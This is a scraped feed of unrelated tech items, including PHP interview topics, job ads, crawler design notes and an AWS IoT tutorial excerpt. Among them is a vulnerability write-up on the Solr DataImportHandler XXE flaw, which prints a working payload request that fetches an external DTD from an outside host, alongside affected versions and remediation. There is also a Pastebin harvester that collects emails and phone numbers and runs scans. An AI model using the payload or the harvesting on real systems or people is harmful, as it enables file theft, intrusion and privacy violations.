  • Copy on write 原理,何时 GC
  • PHP 进程模型,进程通讯方式,进程线程区别
  • yield 核心原理是什么
  • PDO prepare 原理
  • PHP 7 与 PHP 5 有什么区别
  • Swoole 适用场景,协程实现方式

前端篇

  • 原生获取 DOM 节点,属性
  • 盒子模型
  • CSS 文件、style 标签、行内 style 属性优先级
  • HTML 与 JS 运行顺序(页面 JS 从上到下)
  • JS 数组操作
  • 类型判断
  • this 作用域
  • .map() 与 this 具体使用场景分析
  • Cookie 读写
  • JQuery 操作
  • Ajax 请求(同步、异步区别)随机数禁止缓存
  • Bootstrap 有什么好处
  • 跨域请求 N 种解决方案
  • 新技术(了解)
    • ES6
    • 模块化
    • 打包
    • 构建工具
    • vue、react、webpack、
    • 前端 mvc
  • 优化
    • 浏览器单域名并发数限制
    • 静态资源缓存 304 (If-Modified-Since 以及 Etag 原理)
    • 多个小图标合并使用 position 定位技术 减少请求
    • 静态资源合为单次请求 并压缩
    • CDN
    • 静态资源延迟加载技术、预加载技术
    • keep-alive
    • CSS 在头部,JS 在尾部的优化(原理)

网络篇

  • IP 地址转 INT
  • 192.168.0.1/16 是什么意思
  • DNS 主要作用是什么?
  • IPv4 与 v6 区别

网络编程篇

  • TCP 三次握手流程
  • TCP、UDP 区别,分别适用场景
  • 有什么办法能保证 UDP 高可用性(了解)
  • TCP 粘包如何解决?
  • 为什么需要心跳?
  • 什么是长连接?
  • HTTPS 是怎么保证安全的?
  • 流与数据报的区别
  • 进程间通信几种方式,最快的是哪种?
  • fork()会发生什么?

API 篇

  • RESTful 是什么
  • 如何在不支持DELETE请求的浏览器上兼容DELETE请求
  • 常见 API 的APP_IDAPP_SECRET主要作用是什么?阐述下流程
  • API 请求如何保证数据不被篡改?
  • JSON 和 JSONP 的区别
  • 数据加密和验签的区别
  • RSA 是什么
  • API 版本兼容怎么处理
  • 限流(木桶、令牌桶)
  • OAuth 2 主要用在哪些场景下
  • JWT
  • PHP 中json_encode(['key'=>123]);与return json_encode([]);区别,会产生什么问题?如何解决

加分项

  • 了解常用语言特性,及不同场景适用性。
    • PHP VS Golang
    • PHP VS Python
    • PHP VS JAVA
  • 了解 PHP 扩展开发
  • 熟练掌握 C

声明

该资料不针对任何一家公司,对因该资料对您产生的影响概不负责,望知晓。

祝顺利


          10分钟总结所有类型SQL注入       Cache   Translate Page   Web Page Cache   

最近在给公司内部培训sql注入。其实很头疼,毕竟sql注入谁都知道,没有什么好讲的。于是一直在思考,这方面我能给大家带来什么干货。毕竟我也不想所有人浪费2个小时听我讲这些已经知道的东西。后来想想也许对于大家来说都知道sql注入,也都了解其原理。但是大家也许并没有对所有的类型进行总结,更不可能从四个维度去梳理sql注入相关知识。于是就有了这篇分享。

PPT内容分享

本次分享,尽自己的能力,尽量使用最精简的代码,最简短的poc和最经典的例子给大家快速总结所有类型SQL注入。希望这10分钟,你能对sql注入有整体的了解。

图1-所有类型sql注入总结


最后的话

我的这些总结其实启发于阿德马师傅对SQL注入的分类,还有《mysql注入天书》的内容,并结合了自己的一些思考。这些分类还是带有一些主观在里面的,有些也分类也比较有争议。比如堆注入是否属于有回显型的注入,报错注入算不算盲注等问题。只能随着自己对sql注入理解的加深,再来更新PPT。

参考文章

手动SQL注入基础详解

https://github.com/lcamry/sqli-labs


          GitHub - needmorecowbell/sniff-paste: Pastebin OSINT Harvester      Cache   Translate Page   Web Page Cache   

README.md

Sniff-Paste: OSINT Pastebin Harvester

image

Multithreaded pastebin scraper, scrapes to mysql database, then reads pastes for noteworthy information.

Use run.sh to go through the entire process of collection, logging, and harvest automatically. The scraper can be set to a paste limit of 0 to scrape indefinitely. If scraped indefinitely, press ctrl + c to stop scraping and start analysis.

There are various tools for handling the harvested lists in the util folder.

Installation

sudo apt install libxslt-dev python3-lxml nmap xsltproc fping mysql-server

pip3 install -r requirements.txt

  • Create database named pastes in mysql server
  • Fill in settings.ini

./run.sh

This will scrape pastebin for the latest number of pastes, then run analysis for ip addresses, emails, and phone numbers. It filters out duplicates and runs scans on some of the harvested data.


          Доработать CMS на фреймворке CodeIgniter      Cache   Translate Page   Web Page Cache   
Добрый день. Нужен разработчик специализирующийся по фреймворку CodeIgniter, на доработку действующего проекта. Проект по генерированию видео шаблонов со страницей оплатой (подписка). Необходимо выполнить следующие задачи... (Budget: $8 - $10 USD, Jobs: Codeigniter, MySQL, PHP)
          Web Development & Design Python, JavaScript, PHP HTML & CSS      Cache   Translate Page   Web Page Cache   
Web Development & Design Python, JavaScript, PHP HTML & CSS#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
Web Development & Design Python, javascript, PHP HTML & CSS
MP4 | Video: AVC 1280x720 | Audio: AAC 44KHz 2ch | Duration: 4.5 Hours | Lec: 29 | 573 MB
Genre: eLearning | Language: English

Web Development For Developer: CSS, HTML, MySQL, Bootstrap, Front-End Backend, Javascipt, Jasmime & Regular Expression

What if you could learn that?

For less than a movie ticket, you will get over 4 hours of video lectures and the freedom to ask me any questions regarding the course as you go through it. :)


          Integration Architect - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Casper, WY jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Software Developer - State of Wyoming - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Preference may be given to those with experience in MS SQL Server or MYSQL. This position is to provide development support in the design and implementation of... $4,506 - $5,632 a month
From State of Wyoming - Thu, 28 Jun 2018 20:49:57 GMT - View all Cheyenne, WY jobs
          Integration Architect - Silverline Jobs - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Cheyenne, WY jobs
          Features Addition in magento 1.9 website www.hotelvaluemart.com      Cache   Translate Page   Web Page Cache   
Job 1 : Module implementation for capability to add order in magento in back date (or just create order from magento from admin and then, modify its date). Job 2: Add upload sections under order, where PDF of invoices, transport papers can be uploaded... (Budget: ₹12500 - ₹37500 INR, Jobs: eCommerce, HTML, Magento, MySQL, PHP)
          正規表現とメタ文字について SQLでlikeを使うとメタ文字と正規表現のどちらが使え...      Cache   Translate Page   Web Page Cache   
正規表現とメタ文字について SQLでlikeを使うとメタ文字と正規表現のどちらが使えるのでしょうか? そもそもSQLでは正規表現とメタ文字の両方を使えるのでしょうか? (mysqlです) また正規表現やメタ文字はプログラミング言語やSQLごとに違うのでしょうか?(企画などはないのか) また分かればでいいのですがLinuxでは正規表現とメタ文字をどうやって使い分けているのかを 教えてください。
          Web Developers(Php & MySQL) - ADVT Software Services - Visakhapatnam, Andhra Pradesh      Cache   Translate Page   Web Page Cache   
Advanced level of knowledge in file, session, ftp, string, object design and paypal accounts setup and related php programming....
From ADVT Software Services - Sat, 23 Jun 2018 07:57:17 GMT - View all Visakhapatnam, Andhra Pradesh jobs
          Project for Richa J.      Cache   Translate Page   Web Page Cache   
Hi Richa J. this is regarding the Oil and Gas Service website you have bid on. I am willing to award you the contest, and add an additional 150$ CAD for the full website with our edits and changes. This means further customizing our site to requirements... (Budget: $150 CAD, Jobs: Hire me, HTML, MySQL, PHP, SEO, Website Design)
          transfer danych z mysql portalu autorskiego do wordpress      Cache   Translate Page   Web Page Cache   
I need to transfer data from one mysql base to another. From old to new base. (Budget: €30 - €250 EUR, Jobs: Graphic Design, PHP, Website Design)
          Project for Richa J.      Cache   Translate Page   Web Page Cache   
Hi Richa J. this is regarding the Oil and Gas Service website you have bid on. I am willing to award you the contest, and add an additional 150$ CAD for the full website with our edits and changes. This means further customizing our site to requirements... (Budget: $150 CAD, Jobs: Hire me, HTML, MySQL, PHP, SEO, Website Design)
          transfer danych z mysql portalu autorskiego do wordpress      Cache   Translate Page   Web Page Cache   
I need to transfer data from one mysql base to another. From old to new base. (Budget: €30 - €250 EUR, Jobs: Graphic Design, PHP, Website Design)
          分布式事务解决方案--消息发送一致性的异常流程处理      Cache   Translate Page   Web Page Cache   

本教程提供的分布式事务解决方案的设计思路在所有微服务架构项目中都适用,与编程语言无关,教程中会重点讲解方案的设计思路。

 

教程中的样例项目基于龙果学院开源的微支付系统进行实现,使用Dubbo作为服务化框架,教程中所实现的分布式事务解决方案在Java体系中的微服务架构系统都能通用,与具体的开发框架无关。

 

教程样例项目中用到的技术及相应的环境:

Dubbo、Spring、SpringMVC、MyBatis、Druid、JDK7(或JDK8)、MySQL5.6、Tomcat


 

 

 

 

 

 

 

 



作者: 小开发仔 
声明: 本文系ITeye网站发布的原创文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

已有 0 人发表回复,猛击->>这里<<-参与讨论


ITeye推荐




          Lowongan Kerja Pengajar Web Programming Freelance      Cache   Translate Page   Web Page Cache   
Pria amp wanitaMin 23 tahunMahir php programming HTML language dan MySQLDomisili Surabaya Sidoarjo Gresik amp MojokertoMempunyai laptop amp motor pribadiSiap bekerja paruh waktuMemiliki sertifikat kompetensi Internasional atau Nasional lebih diutamakan

          Lowongan Kerja Marketing Support      Cache   Translate Page   Web Page Cache   
Minimum 2 Tahun di pembuatan aplikasi / maintain website.Menguasai PHP Framework : Symfony mySQL HTMLMenguasai Design GraphicPria/ Wanita 21-26 tahun .Jujur teliti dan bersemangat menyelesaikan tugas.Insentif :Insentif yang menarik bila dapat membantu merdquocloserdquo deal ...

          Sr. Software Engineer 3 - The Kenjya-Trusant Group, LLC - Annapolis Junction, MD      Cache   Translate Page   Web Page Cache   
Java/JEE, JavaScript, Java Expression Language (JEXL), J1BX, Flex, EXT - JS, JSP, .NET, AJAX, SEAM, C, C++, PHP, Ruby / Ruby-on-Rails, SQL, MS SQL Server, MySQL...
From The Kenjya-Trusant Group, LLC - Wed, 11 Apr 2018 21:39:13 GMT - View all Annapolis Junction, MD jobs
          Cloud Native application Engineer      Cache   Translate Page   Web Page Cache   
NJ-Basking Ridge, Terrific Contract Opportunity with a FULL suite of benefits! Position: Cloud Native application Engineer Location: Basking Ridge, New Jersey 07920 Duration: 9 Months Day-to-Day Responsibilities: Developing software primarily in JavaScript: React on the front-end and Node.js on the back-end. SQL knowledge (MySQL or PostgreSQL specifically, indexing, scaling, etc.) Building and maintaining RESTful A
          Web Developers(Php & MySQL) - ADVT Software Services - Visakhapatnam, Andhra Pradesh      Cache   Translate Page   Web Page Cache   
Advanced level of knowledge in file, session, ftp, string, object design and paypal accounts setup and related php programming....
From ADVT Software Services - Sat, 23 Jun 2018 07:57:17 GMT - View all Visakhapatnam, Andhra Pradesh jobs
          智能爬虫架构      Cache   Translate Page   Web Page Cache   

1.技术选型

Python+Scrapy(引擎、调度URL管理、爬虫、下载器、钩子中间件、数据管道等)

Java+HtmlParser/Jsoup+Crawler4j/WebMagic/JSpider+HttpClient+Heririx/Nutch

2.场景

任务启动、停止、执行,分发管理,策略下发、监控等。 引擎信息,爬虫信息全局视图。

爬数据目标:网站、网页、请求、数据、挑选、清理、转换、去重BloomFilter、融合、缓冲、存储、索引等

爬数据手段:爬虫、请求、反爬虫避让(代理ip)、html解析、json解析、xml解析xpath、正则表达式。去重。

爬虫数据处理:文本、链接、图片、视频、css、js脚本等,图片&视频存储方式

爬虫目标信息配置:1.网站、app、H5信息、登录信息   2.获取数据Url管理    3.解析要抓取字段映射规则XML配置  4.执行策略,执行频率,定时抓取数据。

爬虫执行策略:1.爬虫分类、爬虫节点信息  3.注册&被调度服务  3.健康状态上报、心跳&健康监测   4.爬虫执行日志、错误日志、汇报完成但是个别失败定时补跑策略、耗时记录监控查询  5.爬虫手动操作  6.爬虫节点上线和下线维护  7.爬虫策略配置下载热启动  8.公共的采集、解析、处理、传输、记录公共组件  9.高性能队列、消息、多线程等编程。

爬虫管理策略:见上一项!

模拟登陆,代理,UA,反反爬虫,异步http多线程下载器

核心数据库模型设计:web+引擎合并到一个集群?任务获取zk引擎节点,改变任务执行配置,所有引擎接到通知,自行判断是否自己执行,启动任务即可,简化架构。虚拟ip映射机制-----引擎宕机或重启或迁移对应机制。

1.Web  2.引擎(server集群) 3.爬虫(serer,)集群

任务在web端管理,启动后分发给某个引擎,取余分片,引擎启动手动或定时调度器组件,调度器采用选取的爬虫和下发爬虫配置策略,爬虫集群根据任务队列分片执行自己的任务,执行完汇总给调取器,调度器返回给引擎,引擎更新任务状态,web界面在Ajax实时更新界面的任务执行状态。

爬虫的宕机故障恢复机制,依靠持久化队列,爬虫重启后,恢复完成遗留任务。引擎会自动感知爬虫组,可以自动或手动选取爬虫并分配任务。

引擎高可用&数据一致性:引擎和web一体呢,简化集群复杂度。没有采用MetaServerHaoop类似机制。

爬虫高可用&数据一致性:

任务相关模型  配置相关模型  日志相关模型  防重复模型等

全局的任务、爬虫、引擎日志&监控&运维&预警策略:

1.日志表(散落各个模块)

2.Hc检查

3.邮件预警模块

4.统计分析模块

5.总体统计监控分析视图

6.阀值等配置

7.爬虫节点上线和下线维护  

8.爬虫策略配置下载热启动  

9.公共的采集、解析、处理、传输、记录公共组件  

10.高性能队列、消息、多线程等编程。

image

•任务模型建立&流程分解:

•每天/每隔一分钟读取微博首页x栏目下的最新博文和所有评论(去重url).关键词提取、文本语义分析、情感打分。

••流程分解、模板配置、自动下发:•提取公共、配置化、定制扩展点:••分片、多进程、多线程、异步高性能抓取。Url缓冲队列。Disruptor多客户端并行消费任务。••多线程Future并行任务控制。••1.新建一个任务•2.抓取网址•3.选取爬虫server(or随机)•4.启动爬虫任务•5.一般是手动立即执行或定时任务执行吧,利用quartz api启动任务或自定义的时间分片调度器。•••6.监控任务执行情况•7.任务执行流程,拉取配置,根据配置执行。8.获取最新更新的博文条目(记录&缓存了上次最后拉取的id)和最新评论的条目url放入berkerlydb队列,随后开展多线程多进程数据抓取,下载器和管道处理。分类日志,补偿抓取,反爬虫抓取失败报警、节点健康监测、状态更新和报警。恢复后重启节点,节点抓取进度本地文件化,berkerlydb持久化队列,先期汇报给引擎是成功抓取了,那么本地恢复后完成本次任务,有日志。(上线中断的爬虫任务,此处补跑;或等待引擎补跑或下次调度)

爬虫任务分发策略,保证高可靠。

1.任务给引擎,选取爬虫组(单个或多个模式)

2.单个任务一个爬虫干(优先)

3.复杂任务多个爬虫一起干,引擎将子任务URL分配下去。

4.引擎提供RPC接口给WEB,任务下发接口。

5.引擎定时调度并分配任务给爬虫完成数据爬取任务。

6.爬虫完后任务,异步更新爬虫任务日志状态,回调给引擎。

7.引擎汇报给web、爬虫汇报给引擎。RPC回调。

8.故障恢复机制&全局预警监控机制:

如果引擎挂了,引擎挂了,任务不能定时调度,重启后读取数据库任务状态和最新进度日志,如果没有停止就继续调度,任务完成汇报日志。

如果爬虫挂了,任务没完成,没有汇报。不会下发新任务,自动感知爬虫节点存活。

重启后,继续未完成的任务,暂不接受新任务。或接受新任务,看采取策略。--不采纳

         汇报机制&继续机制:web自动感知引擎信息和爬虫信息,引擎自动感知爬虫信息,爬虫任务会暂时缓存调度引擎信息,好完成汇报。 任

务模型表,任务最新一次进度表,状态日志表。

总的任务分片给一个引擎,记录数据库,引擎启动,加载任务,定时调度,从任务上次的最新位置爬取数据。如果引擎故障,自动临时分配给其他

备份引擎执行,记录在备份引擎字段上,恢复后采用主引擎执行。引擎重启后,恢复所属任务的调度,接受新任务,从中断任务那次重新来调度一次

,再按规定频率执行调度。手动执行一次也可支持。

调度单个爬虫,完成任务更新进度,故障不更新任务最新进度,重启后会被引擎下次调度本爬虫或其他爬虫执行,从此进度开启执行,更新任务执

行爬虫ip。调度多个爬虫,多个爬虫都完成了,汇报计数器达到才更新总的任务进度并销毁待完成任务缓存信息状态,单线程任务扫描超预估耗时

均值的未完成任务报警查看,删除某些长时间未完成的任务预警出来(爬虫故障导致任务永远失败),否则这次白爬了,重新爬取,数据库唯一键

去重&&程序防重复设计。爬虫失败意味着任务失败,下次重新调度即可。

爬虫是无状态的,干活,干完才汇报给引擎,引擎认为单个或多个爬虫都汇报完成,才认为成功并更新任务进度flag。

防重复机制设计:表,保留最近一周防重复数据,比如任务执行一半,最新进度确认不了,那么再次执行,会有跟多数据重复,现在防重复表&缓存

拦截一道。不能完全依赖数据库唯一键值约束阻止重复数据保存和非保存数据库场景下的使用。

每个任务,每个爬虫都有任务日志监控的,便于排查问题。

•数据处理、存储、应用:••数据模型建立•分类•缓存•HDFS文件•HIVE表 Hbase表•MongoDB存储网页文本数据•FastDFS小图片存储、小视频文件•

数据分布式存储设计:大数据量,根据数据分类、融合数据表,partionaltable,sharding

databaseor table,在大数据时采用spider+kafka+storm/hadoop(HDFS)+redis+mysql处

理。文件、mongodb网页数据.在线分析和离线存储。

爬虫高性能策略设计:队列、缓存、多线程、berkerlydb、异步网络编程。

爬虫数据的搜索架构设计:参看搜索架构设计PPT。

爬虫大数据的文本分析NLP、主题提取、热点监控、标签云、舆情分析应用。

6.应用

用户征信数据

品牌舆情监控

政府舆情监控

商业竞争情报获取:电商竞争对手商品比价,YHD D5对比JD商品价格PIS系统,智能调价。

垂直行业信息搜集

全面搜索引擎

无限深度级别的爬虫,比如Google、百度、必应、搜狗、360搜索等。

垂直行业、电商等专业爬虫,限制深度或定制深度的爬虫。

面向应用:

离线爬虫,数据存储,索引或查询、离线分析等。

在线爬虫,实时爬数据,实时处理,比如智能比价调价。

如果有价值收益,长按下图关注公众号。

image


          Solr DIH dataConfig参数XXE漏洞      Cache   Translate Page   Web Page Cache   

别人的CVE,编号CVE-2018-1308。今天无意看到了,刚好有用Solr搭建过服务,所以来水一篇。

0x01 背景介绍

DataImportHandler主要用于从数据库抓取数据并创建索引,Solr搭建完毕,并将数据插入到MySQL等数据库之后,需要创建Core,并且对数据库中的数据生成索引,在生成索引的时候就会用到DIH。

在使用solr web控制台生成core索引的时候,dataConfig参数存在xxe漏洞,攻击者可以向服务端提交恶意的xml数据,利用恶意xml数据可以读取被攻击服务器的敏感文件、目录等。

漏洞影响版本:

Solr 1.2 to 6.6.2

Solr 7.0.0 to 7.2.1

漏洞原文链接:

https://issues.apache.org/jira/browse/SOLR-11971

http://seclists.org/oss-sec/2018/q2/22

0x02 漏洞测试

1、打开Solr Admin控制台;

2、选择创建好的core,然后点击DataImport功能;

3、点击”Execute“的时候,进行抓包,可以获取Dataimport的具体请求。

也可以直接访问功能入口Url:

http://www.nxadmin.com/solr/#/corename/dataimport

以solr 6.0.1为例,抓包获取的测试请求如下:

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest

默认请求中是不存在漏洞参数dataConfig的,使用的是配置文件的方式data-config.xml中包含了mysql数据库的连接配置,以及需要生成索引的表的字段等信息。有关请求中非默认参数的相关代码片段:

package org.apache.solr.handler.dataimport;
......
public class RequestInfo {
  private final String command;
  private final boolean debug;  
  private final boolean syncMode;
  private final boolean commit; 
  private final boolean optimize;
  ......
  private final String configFile;
  private final String dataConfig;

  public RequestInfo(SolrQueryRequest request, Map<String,Object> requestParams, ContentStream stream) {
  
  ......
  
    String dataConfigParam = (String) requestParams.get("dataConfig");
    if (dataConfigParam != null && dataConfigParam.trim().length() == 0) {
      //如果dataConfig参数的值为空,将该参数置为null
      dataConfigParam = null;
    }
    dataConfig = dataConfigParam;
    
 ......
 
   public String getDataConfig() {
    return dataConfig;
  }
  
 ......
 
}

使用如上请求,可以自行添加dataConfig参数,因此具体的漏洞测试请求如下;

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2Fsolrxxe.8ug564.ceye.io%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E

以上是漏洞作者提供的测试payload,使用dnslog的方式证明漏洞存在,如图:

image

0x03 修复建议&缓解措施

1、升级到6.6.3或7.3版本;

2、或者将solr Admin控制台放到内网;

3、以6.0.1为例,可以为控制台增加401认证方式,6.0.1默认是没有授权认证的,匿名用户可直接访问管理控制台,需要单独配置增加401认证。在配置的时候需要注意,涉及到的主要功能请求URL都需要进行401认证,否则有可能会被攻击者直接访问功能请求来绕过401认证。


          Project for Sergey G.      Cache   Translate Page   Web Page Cache   
Hello i need someone to check on replication, and also do monthly maintenance on MSSQL databases. the first job should be quick, but could last monthly. (Budget: $100 USD, Jobs: ASP, Hire me, Javascript, MySQL, PHP, WordPress)
          SAP Online Training      Cache   Translate Page   Web Page Cache   
We offer online training We are looking for Online Trainers on below technologies: SAP BW HANA SAP HANA Admin (Budget: $30 - $250 USD, Jobs: Moodle, MySQL, Oracle, PHP, SAP)
          All Skills People Required For several Projects      Cache   Translate Page   Web Page Cache   
Hi We have started a new organisation and we need people for multiple Skills. We need people for long term projects. We have projects related to different skills sets. 1) Grahic Design 2) Web Design... (Budget: $3000 - $5000 USD, Jobs: MySQL, PHP, Python, vBulletin, WordPress)
          dotConnect for MySQL 8.11      Cache   Translate Page   Web Page Cache   
ADO.NET provider for MySQL with Entity Framework,LinqConnect,NHibernate Support
          Project for Sergey G.      Cache   Translate Page   Web Page Cache   
Hello i need someone to check on replication, and also do monthly maintenance on MSSQL databases. the first job should be quick, but could last monthly. (Budget: $100 USD, Jobs: ASP, Hire me, Javascript, MySQL, PHP, WordPress)
          SAP Online Training      Cache   Translate Page   Web Page Cache   
We offer online training We are looking for Online Trainers on below technologies: SAP BW HANA SAP HANA Admin (Budget: $30 - $250 USD, Jobs: Moodle, MySQL, Oracle, PHP, SAP)
          All Skills People Required For several Projects      Cache   Translate Page   Web Page Cache   
Hi We have started a new organisation and we need people for multiple Skills. We need people for long term projects. We have projects related to different skills sets. 1) Grahic Design 2) Web Design... (Budget: $3000 - $5000 USD, Jobs: MySQL, PHP, Python, vBulletin, WordPress)
          Visual basic expert Small urgent job      Cache   Translate Page   Web Page Cache   
I need the Visual basic expert freelancer for my current project. Details will be shared with winning bidder. Please bid if you have the experience. (Budget: $250 - $750 USD, Jobs: Graphic Design, MySQL, PHP, Software Architecture, Visual Basic)
          Visual basic expert Small urgent job      Cache   Translate Page   Web Page Cache   
I need the Visual basic expert freelancer for my current project. Details will be shared with winning bidder. Please bid if you have the experience. (Budget: $250 - $750 USD, Jobs: Graphic Design, MySQL, PHP, Software Architecture, Visual Basic)
          Fix 'this authentication plugin is not supported' issue while using Go to connect MySQL 8      Cache   Translate Page   Web Page Cache   
MySQL 8 has changed its default authentication plugin from mysql_native_password to caching_sha2_password to improve its security. However many third party libraries seem act slowly to catch up with this change. This causes some compatible issues with their connection to MySQL. One of the issues is seen in Go libraries while it's trying to connect to MySQL 8. The specific error has been obser
          Visual basic expert Small urgent job      Cache   Translate Page   Web Page Cache   
I need the Visual basic expert freelancer for my current project. Details will be shared with winning bidder. Please bid if you have the experience. (Budget: $250 - $750 USD, Jobs: Graphic Design, MySQL, PHP, Software Architecture, Visual Basic)
          Web Applications Developer - OPW - De Pere, WI      Cache   Translate Page   Web Page Cache   
Relational database, modern schema-less scalable databases, SQL, MySQL, MongoDB, etc. For over 30 years, PDQ Manufacturing, Inc., has provided the vehicle wash...
From Dover Corporation - Fri, 18 May 2018 20:37:55 GMT - View all De Pere, WI jobs
          Develop Website for Youth Community Service Non-profit Organization      Cache   Translate Page   Web Page Cache   
Looking to have a small responsive website design for a Non-profit Community Service organization. The website will run on a Linux hosted server with MySQL. The website needs to include the following; Four (3) Slider images on the home... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Uniface Developer - Oscar Technology - Rossendale      Cache   Translate Page   Web Page Cache   
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          Sensor Data Processing on AWS using IoT Core, Kinesis and ElastiCache      Cache   Translate Page   Web Page Cache   

This blog post is part of my AWS series:

Introduction

Internet of Things (IoT) became a hot topic in the recent years. Companies are forecasting billions of connected devices in the years to come. IoT applications have different characteristics than traditional software projects. Applications operate on constrained hardware, network connections are unreliable, and the data coming from many different sensors need to be available in near real-time.

With the rise of cheap and available microprocessors and microcontrollers like the Rasperry Pi and Arduino products, the barrier of entry for working on IoT products has been lowered significantly. But also the software and development toolstack matured.

In December 2015 AWS IoT became generally available. AWS IoT is a collection of products to manage and connect IoT devices to the cloud. Its IoT Core product acts as the entry point. IoT Core accepts data via MQTT and then processes and forwards it to other AWS services according to preconfigured rules.

In this blog post we want to build an exemplary sensor data backend powered by IoT Core, Kinesis, Lambda, ElastiCache, Elastic Beanstalk, and S3. The goal is to accept sensor data, persist it in an S3 bucket, and at the same time display a live feed on the web. The architecture should be extensible so we can add more functionality like analytics or notifications later.

The remainder of the post is structured as follows. First we will present the architecture overview. Afterwards we are going to deep dive into the implementation. We will omit going into details about the VPC and networking part as well as the Elastic Beanstalk deployment as this has been discussed in previous posts already. We are closing the blog post discussing the main findings.

Architecture

architecture overview#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

IoT Core acts as the MQTT message broker. It uses topics to route messages from publishers to subscribers. Whenever a message is published to a topic, all subscribers will be notified about the message. IoT core allows us to send messages to other AWS services efficiently using rules. A rule corresponds to a SQL select statement which defines when it should be triggered, e.g. for all messages from a certain topic.

Each rule can have multiple actions associated with it. An action defines what should happen to the selected messages. There are many different actions supported but we are only going to use the Firehose and Kinesis actions in the course of this post.

The Firehose action forwards the messages to a Kinesis Firehose delivery stream. Firehose collects messages for a configured amount of time or until a certain batch size is reached and persists it to the specified location. In our case we would like to persist the messages as small batches in an S3 bucket.

A Kinesis data stream is used to decouple the processing logic from the data ingestion. This enables us to asynchronously consume messages from the stream by multiple independent consumers. As the message offset can be managed individually by each consumer we can also decide to replay certain messages in case of downstream failure.

The main data processing is happening within our Lambda function. A convenient way to process a Kinesis data stream with a Lambda function is to configure the stream as an event source. We will use this stream-based model, because Lambda polls the stream for you and when it detects new records, invokes your function, passing the new records as a parameter. It is possible to add more consumers to the data stream, e.g., an Akka Streams application that allows more granular control of the message digestion.

The Lambda function will update a Redis instance managed by ElastiCache. In our example we will increment a message counter for each record, as well as storing the last message received. We are using Redis' Pub/Sub functionality to notify our web application, which updates all the clients through a WebSocket connection.

We are going to use the MQTT test client built into IoT core for publishing messages to our topic. As an outlook please find an animation of the final result below. Let's look into the implementation step by step in the next section.

demo#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Implementation

Development Tool Stack

To develop the solution we are using the following tools:

  • Terraform v0.11.7
  • SBT 1.0.4
  • Scala 2.12.6
  • IntelliJ + Scala Plugin + Terraform Plugin

The source code is available on GitHub. Now let's look into the implementation details of each component.

IoT Core

iot core#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

When working with IoT core there is no setup required. Every AWS account is able to use the MQTT broker as a fully managed service out of the box. So the only thing we need to do is to configure our topic rule and the respective actions forwarding messages to Kinesis and Firehose.

resource "aws_iot_topic_rule" "rule" {
  name        = "${local.project_name}Kinesis"
  description = "Kinesis Rule"
  enabled     = true
  sql         = "SELECT * FROM 'topic/${local.iot_topic}'"
  sql_version = "2015-10-08"

  kinesis {
    role_arn    = "${aws_iam_role.iot.arn}"
    stream_name = "${aws_kinesis_stream.sensors.name}"
    partition_key = "$${newuuid()}"
  }

  firehose {
    delivery_stream_name = "${aws_kinesis_firehose_delivery_stream.sensors.name}"
    role_arn = "${aws_iam_role.iot.arn}"
  }
}

The rule will be triggered for all messages in the topic/sensors topic. Using newuuid() as a partition key for Kinesis is fine for our demo as we will anyway have only one shard. In a productive scenario you should think about choosing the partition key in a way that fits your requirements.

The execution roles used need to allow the kinesis:PutRecord and firehose:PutRecord action, respectively. Here we are using the same role twice but I recommend to setup two roles with the least possible permissions.

Now that we have the rule configured, let's create the Firehose delivery stream and the Kinesis data stream next.

Firehose Delivery Stream

firehose delivery stream#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

